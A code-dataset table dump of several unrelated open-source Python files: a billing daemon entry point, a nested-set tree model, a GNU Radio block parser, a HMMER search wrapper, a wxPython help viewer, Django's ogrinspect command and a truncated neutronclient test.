repo_name (stringlengths 5 to 100) | path (stringlengths 4 to 299) | copies (stringclasses, 990 values) | size (stringlengths 4 to 7) | content (stringlengths 666 to 1.03M) | license (stringclasses, 15 values) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17 to 100) | line_max (int64, 7 to 1k) | alpha_frac (float64, 0.25 to 0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
cemrecan/a2billing-spyne | a2billing_spyne/main.py | 2 | 2538 | # encoding: utf8
#
# This file is part of the a2billing-spyne project.
# Copyright (c), Arskom Ltd. (arskom.com.tr),
# Cemrecan Ünal <[email protected]>.
# Burak Arslan <[email protected]>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the Arskom Ltd. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function

from contextlib import closing

import logging
logger = logging.getLogger(__name__)


def bootstrap(config):
    from neurons import TableModel
    import a2billing_spyne.model

    db = config.get_main_store()
    with closing(db.Session()) as session:
        TableModel.Attributes.sqla_metadata.create_all(checkfirst=True)
        session.commit()


def init(config):
    from a2billing_spyne.application import start_a2bs

    logger.debug("This is init.")
    return [
        ('a2bs', start_a2bs),
    ]


def main():
    import sys

    from neurons.daemon import ServiceDaemon
    from neurons.daemon.main import main as neurons_main

    return neurons_main('a2billing-spyne',
                        sys.argv, init, bootstrap, cls=ServiceDaemon)
| bsd-3-clause | 5,981,095,394,154,214,000 | 36.308824 | 80 | 0.734332 | false |
saurabh6790/omnitech-lib | webnotes/utils/nestedset.py | 10 | 7568 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Tree (Hierarchical) Nested Set Model (nsm)
#
# To use the nested set model,
# use the following pattern
# 1. name your parent field "parent_item_group", or set a property nsm_parent_field on the document class giving your parent field's name
# 2. have a field called "old_parent" in your fields list - this identifies whether the parent has been changed
# 3. call update_nsm(doc_obj) in the on_update method
# ------------------------------------------
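# A minimal sketch of the pattern above (the doctype and field names here are
# hypothetical, not part of this module):
#
#     class ItemGroupController(DocTypeNestedSet):
#         nsm_parent_field = "parent_item_group"
#
# DocTypeNestedSet.on_update() then calls update_nsm(self) whenever the
# document is saved, keeping the lft/rgt tree indexes consistent.
# In the nested set model each node stores a left (lft) and right (rgt) index;
# a node's descendants are exactly the rows whose lft/rgt fall between its own.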
from __future__ import unicode_literals
import webnotes
from webnotes import msgprint, _
# called in the on_update method
def update_nsm(doc_obj):
# get fields, data from the DocType
pf, opf = 'parent_node', 'old_parent'
if str(doc_obj.__class__)=='webnotes.model.doc.Document':
# passed as a Document object
d = doc_obj
else:
# passed as a DocType object
d = doc_obj.doc
if hasattr(doc_obj,'nsm_parent_field'):
pf = doc_obj.nsm_parent_field
if hasattr(doc_obj,'nsm_oldparent_field'):
opf = doc_obj.nsm_oldparent_field
p, op = d.fields.get(pf, ''), d.fields.get(opf, '')
# has parent changed (?) or parent is None (root)
if not d.lft and not d.rgt:
update_add_node(d, p or '', pf)
elif op != p:
update_move_node(d, pf)
# set old parent
d.fields[opf] = p
webnotes.conn.set_value(d.doctype, d.name, opf, p or '')
# reload
d._loadfromdb()
def update_add_node(doc, parent, parent_field):
"""
insert a new node
"""
from webnotes.utils import now
n = now()
doctype = doc.doctype
name = doc.name
# get the last sibling of the parent
if parent:
left, right = webnotes.conn.sql("select lft, rgt from `tab%s` where name=%s" \
% (doctype, "%s"), parent)[0]
validate_loop(doc.doctype, doc.name, left, right)
else: # root
right = webnotes.conn.sql("select ifnull(max(rgt),0)+1 from `tab%s` where ifnull(`%s`,'') =''" % (doctype, parent_field))[0][0]
right = right or 1
# update all on the right
webnotes.conn.sql("update `tab%s` set rgt = rgt+2, modified='%s' where rgt >= %s" %(doctype,n,right))
webnotes.conn.sql("update `tab%s` set lft = lft+2, modified='%s' where lft >= %s" %(doctype,n,right))
# update index of new node
if webnotes.conn.sql("select * from `tab%s` where lft=%s or rgt=%s"% (doctype, right, right+1)):
webnotes.msgprint("Nested set error. Please send mail to support")
raise Exception
webnotes.conn.sql("update `tab%s` set lft=%s, rgt=%s, modified='%s' where name='%s'" % (doctype,right,right+1,n,name))
return right
def update_move_node(doc, parent_field):
parent = doc.fields.get(parent_field)
if parent:
new_parent = webnotes.conn.sql("""select lft, rgt from `tab%s`
where name = %s""" % (doc.doctype, '%s'), parent, as_dict=1)[0]
validate_loop(doc.doctype, doc.name, new_parent.lft, new_parent.rgt)
# move to dark side
webnotes.conn.sql("""update `tab%s` set lft = -lft, rgt = -rgt
where lft >= %s and rgt <= %s"""% (doc.doctype, '%s', '%s'), (doc.lft, doc.rgt))
# shift left
diff = doc.rgt - doc.lft + 1
webnotes.conn.sql("""update `tab%s` set lft = lft -%s, rgt = rgt - %s
where lft > %s"""% (doc.doctype, '%s', '%s', '%s'), (diff, diff, doc.rgt))
# shift left rgts of ancestors whose only rgts must shift
webnotes.conn.sql("""update `tab%s` set rgt = rgt - %s
where lft < %s and rgt > %s"""% (doc.doctype, '%s', '%s', '%s'),
(diff, doc.lft, doc.rgt))
if parent:
new_parent = webnotes.conn.sql("""select lft, rgt from `tab%s`
where name = %s""" % (doc.doctype, '%s'), parent, as_dict=1)[0]
# set parent lft, rgt
webnotes.conn.sql("""update `tab%s` set rgt = rgt + %s
where name = %s"""% (doc.doctype, '%s', '%s'), (diff, parent))
# shift right at new parent
webnotes.conn.sql("""update `tab%s` set lft = lft + %s, rgt = rgt + %s
where lft > %s""" % (doc.doctype, '%s', '%s', '%s'),
(diff, diff, new_parent.rgt))
# shift right rgts of ancestors whose only rgts must shift
webnotes.conn.sql("""update `tab%s` set rgt = rgt + %s
where lft < %s and rgt > %s""" % (doc.doctype, '%s', '%s', '%s'),
(diff, new_parent.lft, new_parent.rgt))
new_diff = new_parent.rgt - doc.lft
else:
# new root
max_rgt = webnotes.conn.sql("""select max(rgt) from `tab%s`""" % doc.doctype)[0][0]
new_diff = max_rgt + 1 - doc.lft
# bring back from dark side
webnotes.conn.sql("""update `tab%s` set lft = -lft + %s, rgt = -rgt + %s
where lft < 0"""% (doc.doctype, '%s', '%s'), (new_diff, new_diff))
def rebuild_tree(doctype, parent_field):
"""
call rebuild_node for all root nodes
"""
# get all roots
webnotes.conn.auto_commit_on_many_writes = 1
right = 1
result = webnotes.conn.sql("SELECT name FROM `tab%s` WHERE `%s`='' or `%s` IS NULL ORDER BY name ASC" % (doctype, parent_field, parent_field))
for r in result:
right = rebuild_node(doctype, r[0], right, parent_field)
webnotes.conn.auto_commit_on_many_writes = 0
def rebuild_node(doctype, parent, left, parent_field):
"""
reset lft, rgt and recursive call for all children
"""
from webnotes.utils import now
n = now()
# the right value of this node is the left value + 1
right = left+1
# get all children of this node
result = webnotes.conn.sql("SELECT name FROM `tab%s` WHERE `%s`='%s'" % (doctype, parent_field, parent))
for r in result:
right = rebuild_node(doctype, r[0], right, parent_field)
# we've got the left value, and now that we've processed
# the children of this node we also know the right value
webnotes.conn.sql("UPDATE `tab%s` SET lft=%s, rgt=%s, modified='%s' WHERE name='%s'" % (doctype,left,right,n,parent))
#return the right value of this node + 1
return right+1
def validate_loop(doctype, name, lft, rgt):
"""check if item not an ancestor (loop)"""
if name in webnotes.conn.sql_list("""select name from `tab%s` where lft <= %s and rgt >= %s""" % (doctype,
"%s", "%s"), (lft, rgt)):
webnotes.throw("""Item cannot be added to its own descendents.""")
class DocTypeNestedSet(object):
def on_update(self):
update_nsm(self)
self.validate_ledger()
def on_trash(self):
parent = self.doc.fields[self.nsm_parent_field]
if not parent:
msgprint(_("Root ") + self.doc.doctype + _(" cannot be deleted."), raise_exception=1)
self.doc.fields[self.nsm_parent_field] = ""
update_nsm(self)
def before_rename(self, olddn, newdn, merge=False, group_fname="is_group"):
if merge:
is_group = webnotes.conn.get_value(self.doc.doctype, newdn, group_fname)
if self.doc.fields[group_fname] != is_group:
webnotes.throw(_("""Merging is only possible between Group-to-Group or
Ledger-to-Ledger"""))
def after_rename(self, olddn, newdn, merge=False):
if merge:
parent_field = "parent_" + self.doc.doctype.replace(" ", "_").lower()
rebuild_tree(self.doc.doctype, parent_field)
def validate_one_root(self):
if not self.doc.fields[self.nsm_parent_field]:
if webnotes.conn.sql("""select count(*) from `tab%s` where
ifnull(%s, '')=''""" % (self.doc.doctype, self.nsm_parent_field))[0][0] > 1:
webnotes.throw(_("""Multiple root nodes not allowed."""))
def validate_ledger(self, group_identifier="is_group"):
if self.doc.fields.get(group_identifier) == "No":
if webnotes.conn.sql("""select name from `tab%s` where %s=%s and docstatus!=2""" %
(self.doc.doctype, self.nsm_parent_field, '%s'), (self.doc.name)):
webnotes.throw(self.doc.doctype + ": " + self.doc.name +
_(" can not be marked as a ledger as it has existing child"))
| mit | 4,414,446,700,787,263,500 | 34.2 | 143 | 0.643103 | false |
alfayez/gnuradio | gr-utils/src/python/modtool/parser_cc_block.py | 9 | 10113 | #
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
''' A parser for blocks written in C++ '''
import re
import sys
def dummy_translator(the_type, default_v=None):
""" Doesn't really translate. """
return the_type
class ParserCCBlock(object):
""" Class to read blocks written in C++ """
def __init__(self, filename_cc, filename_h, blockname, version, type_trans=dummy_translator):
self.code_cc = open(filename_cc).read()
self.code_h = open(filename_h).read()
self.blockname = blockname
self.type_trans = type_trans
self.version = version
def read_io_signature(self):
""" Scans a .cc file for an IO signature. """
def _figure_out_iotype_and_vlen(iosigcall, typestr):
""" From a type identifier, returns the data type.
E.g., for sizeof(int), it will return 'int'.
Returns a list! """
if 'gr_make_iosignaturev' in iosigcall:
print 'tbi'
raise ValueError
return {'type': [_typestr_to_iotype(x) for x in typestr.split(',')],
'vlen': [_typestr_to_vlen(x) for x in typestr.split(',')]
}
def _typestr_to_iotype(typestr):
""" Convert a type string (e.g. sizeof(int) * vlen) to the type (e.g. 'int'). """
type_match = re.search('sizeof\s*\(([^)]*)\)', typestr)
if type_match is None:
return self.type_trans('char')
return self.type_trans(type_match.group(1))
def _typestr_to_vlen(typestr):
""" From a type identifier, returns the vector length of the block's
input/out. E.g., for 'sizeof(int) * 10', it returns 10. For
'sizeof(int)', it returns '1'. For 'sizeof(int) * vlen', it returns
the string vlen. """
# Catch fringe case where no sizeof() is given
if typestr.find('sizeof') == -1:
return typestr
if typestr.find('*') == -1:
return '1'
vlen_parts = typestr.split('*')
for fac in vlen_parts:
if fac.find('sizeof') != -1:
vlen_parts.remove(fac)
if len(vlen_parts) == 1:
return vlen_parts[0].strip()
elif len(vlen_parts) > 1:
return '*'.join(vlen_parts).strip()
iosig = {}
iosig_regex = '(?P<incall>gr_make_io_signature[23v]?)\s*\(\s*(?P<inmin>[^,]+),\s*(?P<inmax>[^,]+),' + \
'\s*(?P<intype>(\([^\)]*\)|[^)])+)\),\s*' + \
'(?P<outcall>gr_make_io_signature[23v]?)\s*\(\s*(?P<outmin>[^,]+),\s*(?P<outmax>[^,]+),' + \
'\s*(?P<outtype>(\([^\)]*\)|[^)])+)\)'
iosig_match = re.compile(iosig_regex, re.MULTILINE).search(self.code_cc)
try:
iosig['in'] = _figure_out_iotype_and_vlen(iosig_match.group('incall'),
iosig_match.group('intype'))
iosig['in']['min_ports'] = iosig_match.group('inmin')
iosig['in']['max_ports'] = iosig_match.group('inmax')
except ValueError, Exception:
print "Error: Can't parse input signature."
try:
iosig['out'] = _figure_out_iotype_and_vlen(iosig_match.group('outcall'),
iosig_match.group('outtype'))
iosig['out']['min_ports'] = iosig_match.group('outmin')
iosig['out']['max_ports'] = iosig_match.group('outmax')
except ValueError, Exception:
print "Error: Can't parse output signature."
return iosig
def read_params(self):
""" Read the parameters required to initialize the block """
def _scan_param_list(start_idx):
""" Go through a parameter list and return a tuple each:
(type, name, default_value). Python's re just doesn't cut
it for C++ code :( """
i = start_idx
c = self.code_h
if c[i] != '(':
raise ValueError
i += 1
param_list = []
read_state = 'type'
in_string = False
parens_count = 0 # Counts ()
brackets_count = 0 # Counts <>
end_of_list = False
this_type = ''
this_name = ''
this_defv = ''
WHITESPACE = ' \t\n\r\f\v'
while not end_of_list:
# Keep track of (), stop when reaching final closing parens
if not in_string:
if c[i] == ')':
if parens_count == 0:
if read_state == 'type' and len(this_type):
raise ValueError(
'Found closing parentheses before finishing last argument (this is how far I got: %s)'
% str(param_list)
)
if len(this_type):
param_list.append((this_type, this_name, this_defv))
end_of_list = True
break
else:
parens_count -= 1
elif c[i] == '(':
parens_count += 1
# Parameter type (int, const std::string, std::vector<gr_complex>, unsigned long ...)
if read_state == 'type':
if c[i] == '<':
brackets_count += 1
if c[i] == '>':
brackets_count -= 1
if c[i] == '&':
i += 1
continue
if c[i] in WHITESPACE and brackets_count == 0:
while c[i] in WHITESPACE:
i += 1
continue
if this_type == 'const' or this_type == '': # Ignore this
this_type = ''
elif this_type == 'unsigned': # Continue
this_type += ' '
continue
else:
read_state = 'name'
continue
this_type += c[i]
i += 1
continue
# Parameter name
if read_state == 'name':
if c[i] == '&' or c[i] in WHITESPACE:
i += 1
elif c[i] == '=':
if parens_count != 0:
raise ValueError(
'While parsing argument %d (%s): name finished but no closing parentheses.'
% (len(param_list)+1, this_type + ' ' + this_name)
)
read_state = 'defv'
i += 1
elif c[i] == ',':
if parens_count:
raise ValueError(
'While parsing argument %d (%s): name finished but no closing parentheses.'
% (len(param_list)+1, this_type + ' ' + this_name)
)
read_state = 'defv'
else:
this_name += c[i]
i += 1
continue
# Default value
if read_state == 'defv':
if in_string:
if c[i] == '"' and c[i-1] != '\\':
in_string = False
else:
this_defv += c[i]
elif c[i] == ',':
if parens_count:
raise ValueError(
'While parsing argument %d (%s): default value finished but no closing parentheses.'
% (len(param_list)+1, this_type + ' ' + this_name)
)
read_state = 'type'
param_list.append((this_type, this_name, this_defv))
this_type = ''
this_name = ''
this_defv = ''
else:
this_defv += c[i]
i += 1
continue
return param_list
# Go, go, go!
if self.version == '37':
make_regex = 'static\s+sptr\s+make\s*'
else:
make_regex = '(?<=_API)\s+\w+_sptr\s+\w+_make_\w+\s*'
make_match = re.compile(make_regex, re.MULTILINE).search(self.code_h)
try:
params_list = _scan_param_list(make_match.end(0))
except ValueError as ve:
print "Can't parse the argument list: ", ve.args[0]
sys.exit(0)
params = []
for plist in params_list:
params.append({'type': self.type_trans(plist[0], plist[2]),
'key': plist[1],
'default': plist[2],
'in_constructor': True})
return params
| gpl-3.0 | 7,838,489,100,535,980,000 | 43.946667 | 126 | 0.437556 | false |
xapple/seqsearch | seqsearch/search/hmmer.py | 1 | 4177 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Written by Lucas Sinclair.
MIT Licensed.
Contact at www.sinclair.bio
"""
# Built-in modules #
import warnings, multiprocessing
# Internal modules #
from seqsearch.databases.pfam import pfam
from seqsearch.databases.tigrfam import tigrfam
# First party modules #
from fasta import FASTA
from autopaths.file_path import FilePath
# Third party modules #
import sh
# Warnings #
warnings.filterwarnings("ignore", "Bio.SearchIO")
warnings.filterwarnings("ignore", "BiopythonWarning")
from Bio import SearchIO
###############################################################################
class HmmQuery(object):
"""An `hmmsearch` job."""
short_name = 'hmmsearch'
long_name = 'HMMER 3.1b2 (February 2015)'
executable = 'hmmsearch'
url = 'http://hmmer.org/'
license = 'GPLv3'
dependencies = []
def __nonzero__(self): return bool(self.out_path)
def __repr__(self):
return '<%s object on %s>' % (self.__class__.__name__, self.query)
def __init__(self, query_path, # The input sequences
db_path = pfam.hmm_db, # The database to search
seq_type = 'prot' or 'nucl', # The seq type of the query_path file
e_value = 0.001, # The search threshold
params = None, # Add extra params for the command line
out_path = None, # Where the results will be dropped
executable = None, # If you want a specific binary give the path
cpus = None): # The number of threads to use
# Save attributes #
self.query = FASTA(query_path)
self.db = FilePath(db_path)
self.params = params if params else {}
self.e_value = e_value
self.seq_type = seq_type
self.executable = FilePath(executable)
# Cores to use #
if cpus is None: self.cpus = min(multiprocessing.cpu_count(), 32)
else: self.cpus = cpus
# Auto detect database short name #
if db_path == 'pfam': self.db = pfam.hmm_db
if db_path == 'tigrfam': self.db = tigrfam.hmm_db
# Output #
if out_path is None:
self.out_path = FilePath(self.query.prefix_path + '.hmmout')
elif out_path.endswith('/'):
self.out_path = FilePath(out_path + self.query.prefix + '.hmmout')
else:
self.out_path = FilePath(out_path)
@property
def command(self):
# Executable #
if self.executable: cmd = [self.executable.path]
else: cmd = ["hmmsearch"]
# Essentials #
cmd += ('-o', '/dev/null', # direct output to file <f>, not stdout
'--tblout', self.out_path, # parsable table of per-sequence hits
'--seed', 1, # set RNG seed to <n>
'--notextw', # unlimited ASCII text output line width
'--acc', # prefer accessions over names in output
self.db,
self.query)
# Options #
for k,v in self.params.items(): cmd += [k, v]
# Return #
return map(str, cmd)
def run(self, cpus=None):
"""Simply run the HMM search locally."""
# Number of threads #
if cpus is None: cpus = self.cpus
# Checks #
assert self.query.exists
assert self.db.exists
# Check if query is not empty #
if self.query.count_bytes == 0:
message = "Hmm search on a file with no sequences. File at '%s'"
warnings.warn(message % self.query, RuntimeWarning)
return False
# Do it #
sh.Command(self.command[0])(['--cpu', str(cpus)] + self.command[1:])
@property
def hits(self):
if not self.out_path:
raise Exception("You can't access results from HMMER before running the algorithm.")
return SearchIO.read(self.out_path, 'hmmer3-tab')
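# Illustrative usage (the FASTA path and thread count below are assumptions,
# not values shipped with this module):
#
#     query = HmmQuery('proteins.fasta', db_path='pfam', e_value=1e-5)
#     query.run(cpus=4)
#     for hit in query.hits:
#         print(hit.id, hit.evalue)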
| mit | -4,540,044,765,341,390,000 | 36.630631 | 99 | 0.534115 | false |
c17r/TagTrain | scripts/utils.py | 2 | 1576 | import os
import re
import sys
from importlib import import_module
_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
_SRC = os.path.join(_ROOT, 'src')
def make_readme(name, repo):
readme = os.path.join(_ROOT, 'README.rst')
with open(readme, 'w') as f:
f.write('''.. start-badges
.. list-table::
:stub-columns: 1
* - tests
- |coveralls|
* - package
- |travis|
.. |travis| image:: https://travis-ci.org/{name}/{repo}.svg?branch=master
:alt: Travis-CI Build Status
:target: https://travis-ci.org/{name}/{repo}
.. |coveralls| image:: https://coveralls.io/repos/github/{name}/{repo}/badge.svg?branch=master
:alt: Coverage Status
:target: https://coveralls.io/github/{name}/{repo}
.. end-badges
'''.format(name=name, repo=repo))
for doc in _get_modules():
f.write(doc)
f.write('')
def make_long_description():
return '\n'.join((doc for doc in _get_modules()))
def _get_modules():
_, folders, _ = next(os.walk(_SRC))
for folder in folders:
if 'egg-info' in folder:
continue
rv = get_module_string(folder)
if rv:
yield rv
def get_module_string(name):
init = os.path.join(_SRC, name, '__init__.py')
try:
with open(init, mode='r', encoding='utf-8') as f:
data = f.read()
return re.search('\A"""(.*)"""', data, flags=re.S | re.M).group(1)
except:
return None
def _get_setup():
sys.path.insert(0, _ROOT)
mod = import_module('setup')
return mod
| mit | 5,689,573,281,355,903,000 | 22.522388 | 94 | 0.578046 | false |
163gal/Time-Line | libs/wx/tools/helpviewer.py | 5 | 2507 | #----------------------------------------------------------------------
# Name: wx.tools.helpviewer
# Purpose: HTML Help viewer
#
# Author: Robin Dunn
#
# Created: 11-Dec-2002
# RCS-ID: $Id: helpviewer.py 45966 2007-05-11 18:54:09Z RD $
# Copyright: (c) 2002 by Total Control Software
# Licence: wxWindows license
#----------------------------------------------------------------------
"""
helpviewer.py -- Displays HTML Help in a wxHtmlHelpController window.
Usage:
helpviewer [--cache=path] helpfile [helpfile(s)...]
Where helpfile is the path to either a .hhp file or a .zip file
which contians a .hhp file. The .hhp files are the same as those
used by Microsoft's HTML Help Workshop for creating CHM files.
"""
import sys, os
#---------------------------------------------------------------------------
def makeOtherFrame(helpctrl):
    import wx
    parent = helpctrl.GetFrame()
    otherFrame = wx.Frame(parent)


def main(args=sys.argv):
    if len(args) < 2:
        print __doc__
        return

    args = args[1:]
    cachedir = None
    if args[0][:7] == '--cache':
        cachedir = os.path.expanduser(args[0].split('=')[1])
        args = args[1:]

    if len(args) == 0:
        print __doc__
        return

    import wx
    import wx.html

    app = wx.PySimpleApp()
    #wx.Log.SetActiveTarget(wx.LogStderr())
    wx.Log.SetLogLevel(wx.LOG_Error)

    # Set up the default config so the htmlhelp frame can save its preferences
    app.SetVendorName('wxWidgets')
    app.SetAppName('helpviewer')
    cfg = wx.ConfigBase.Get()

    # Add the Zip filesystem
    wx.FileSystem.AddHandler(wx.ZipFSHandler())

    # Create the viewer
    helpctrl = wx.html.HtmlHelpController()
    if cachedir:
        helpctrl.SetTempDir(cachedir)

    # and add the books
    for helpfile in args:
        print "Adding %s..." % helpfile
        helpctrl.AddBook(helpfile, 1)

    # The frame used by the HtmlHelpController is set to not prevent
    # app exit, so in the case of a standalone helpviewer like this
    # when the about box or search box is closed the help frame will
    # be the only one left and the app will close unexpectedly.  To
    # work around this we'll create another frame that is never shown,
    # but which will be closed when the helpviewer frame is closed.
    wx.CallAfter(makeOtherFrame, helpctrl)

    # start it up!
    helpctrl.DisplayContents()
    app.MainLoop()


if __name__ == '__main__':
    main()
| gpl-3.0 | 1,577,971,815,337,801,700 | 26.549451 | 78 | 0.588353 | false |
reinout/django | django/contrib/gis/management/commands/ogrinspect.py | 20 | 5848 | import argparse
from django.contrib.gis import gdal
from django.core.management.base import BaseCommand, CommandError
from django.utils.inspect import get_func_args
class LayerOptionAction(argparse.Action):
"""
Custom argparse action for the `ogrinspect` `layer_key` keyword option
which may be an integer or a string.
"""
def __call__(self, parser, namespace, value, option_string=None):
try:
setattr(namespace, self.dest, int(value))
except ValueError:
setattr(namespace, self.dest, value)
class ListOptionAction(argparse.Action):
"""
Custom argparse action for `ogrinspect` keywords that require
a string list. If the string is 'True'/'true' then the option
value will be a boolean instead.
"""
def __call__(self, parser, namespace, value, option_string=None):
if value.lower() == 'true':
setattr(namespace, self.dest, True)
else:
setattr(namespace, self.dest, value.split(','))
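# For example (illustrative): "--layer 3" stores the integer 3 and
# "--layer roads" stores the string "roads" via LayerOptionAction, while
# "--null true" stores True and "--null name,desc" stores ['name', 'desc']
# via ListOptionAction.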
class Command(BaseCommand):
help = (
'Inspects the given OGR-compatible data source (e.g., a shapefile) and outputs\n'
'a GeoDjango model with the given model name. For example:\n'
' ./manage.py ogrinspect zipcode.shp Zipcode'
)
requires_system_checks = False
def add_arguments(self, parser):
parser.add_argument('data_source', help='Path to the data source.')
parser.add_argument('model_name', help='Name of the model to create.')
parser.add_argument(
'--blank', dest='blank',
action=ListOptionAction, default=False,
help='Use a comma separated list of OGR field names to add '
'the `blank=True` option to the field definition. Set to `true` '
'to apply to all applicable fields.',
)
parser.add_argument(
'--decimal', dest='decimal',
action=ListOptionAction, default=False,
help='Use a comma separated list of OGR float fields to '
'generate `DecimalField` instead of the default '
'`FloatField`. Set to `true` to apply to all OGR float fields.',
)
parser.add_argument(
'--geom-name', dest='geom_name', default='geom',
help='Specifies the model name for the Geometry Field (defaults to `geom`)'
)
parser.add_argument(
'--layer', dest='layer_key',
action=LayerOptionAction, default=0,
help='The key for specifying which layer in the OGR data '
'source to use. Defaults to 0 (the first layer). May be '
'an integer or a string identifier for the layer.',
)
parser.add_argument(
'--multi-geom', action='store_true', dest='multi_geom',
help='Treat the geometry in the data source as a geometry collection.',
)
parser.add_argument(
'--name-field', dest='name_field',
help='Specifies a field name to return for the __str__() method.',
)
parser.add_argument(
'--no-imports', action='store_false', dest='imports',
help='Do not include `from django.contrib.gis.db import models` statement.',
)
parser.add_argument(
'--null', dest='null', action=ListOptionAction, default=False,
help='Use a comma separated list of OGR field names to add '
'the `null=True` option to the field definition. Set to `true` '
'to apply to all applicable fields.',
)
parser.add_argument(
'--srid', dest='srid',
help='The SRID to use for the Geometry Field. If it can be '
'determined, the SRID of the data source is used.',
)
parser.add_argument(
'--mapping', action='store_true', dest='mapping',
help='Generate mapping dictionary for use with `LayerMapping`.',
)
def handle(self, *args, **options):
data_source, model_name = options.pop('data_source'), options.pop('model_name')
# Getting the OGR DataSource from the string parameter.
try:
ds = gdal.DataSource(data_source)
except gdal.GDALException as msg:
raise CommandError(msg)
# Returning the output of ogrinspect with the given arguments
# and options.
from django.contrib.gis.utils.ogrinspect import _ogrinspect, mapping
# Filter options to params accepted by `_ogrinspect`
ogr_options = {k: v for k, v in options.items()
if k in get_func_args(_ogrinspect) and v is not None}
output = [s for s in _ogrinspect(ds, model_name, **ogr_options)]
if options['mapping']:
# Constructing the keyword arguments for `mapping`, and
# calling it on the data source.
kwargs = {
'geom_name': options['geom_name'],
'layer_key': options['layer_key'],
'multi_geom': options['multi_geom'],
}
mapping_dict = mapping(ds, **kwargs)
# This extra legwork is so that the dictionary definition comes
# out in the same order as the fields in the model definition.
rev_mapping = {v: k for k, v in mapping_dict.items()}
output.extend(['', '', '# Auto-generated `LayerMapping` dictionary for %s model' % model_name,
'%s_mapping = {' % model_name.lower()])
output.extend(" '%s': '%s'," % (
rev_mapping[ogr_fld], ogr_fld) for ogr_fld in ds[options['layer_key']].fields
)
output.extend([" '%s': '%s'," % (options['geom_name'], mapping_dict[options['geom_name']]), '}'])
return '\n'.join(output) + '\n'
| bsd-3-clause | 9,150,530,282,185,798,000 | 42.969925 | 112 | 0.582763 | false |
amahabal/PySeqsee | farg/core/categorization/binding.py | 1 | 1186 | # Copyright (C) 2011, 2012 Abhijit Mahabal
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this
# program. If not, see <http://www.gnu.org/licenses/>
"""Specification of how an instance is a member of some category."""
class Binding:
  """Specification of how an instance is a member of some category."""

  def __init__(self, **bindings):
    self.bindings = dict(bindings)

  def GetBindingsForAttribute(self, attribute_name):
    """Get the binding of a single attribute."""
    return self.bindings[attribute_name]

  def __str__(self):
    serialized_dict = dict((k, str(v)) for k, v in self.bindings.items())
    return 'Bindings: %s' % serialized_dict
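# Example (hypothetical attribute names):
#
#     b = Binding(length=3, start=7)
#     b.GetBindingsForAttribute('length')   # -> 3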
| gpl-3.0 | 2,296,654,989,369,674,000 | 41.357143 | 85 | 0.730185 | false |
ralphwort/chef-repo | build/python-neutronclient/neutronclient/tests/unit/test_cli20_extensions.py | 2 | 1955 | # Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from neutronclient.neutron.v2_0.extension import ListExt
from neutronclient.neutron.v2_0.extension import ShowExt
from neutronclient.tests.unit.test_cli20 import CLITestV20Base
from neutronclient.tests.unit.test_cli20 import MyApp
class CLITestV20Extension(CLITestV20Base):
    id_field = 'alias'

    def test_list_extensions(self):
        resources = 'extensions'
        cmd = ListExt(MyApp(sys.stdout), None)
        contents = [{'alias': 'ext1', 'name': 'name1', 'other': 'other1'},
                    {'alias': 'ext2', 'name': 'name2', 'other': 'other2'}]
        ret = self._test_list_resources(resources, cmd,
                                        response_contents=contents)
        ret_words = set(ret.split())
        # Check only the default columns are shown.
        self.assertTrue('name' in ret_words)
        self.assertTrue('alias' in ret_words)
        self.assertFalse('other' in ret_words)

    def test_show_extension(self):
        # -F option does not work for ext-show at the moment, so -F option
        # is not passed in the commandline args as other tests do.
        resource = 'extension'
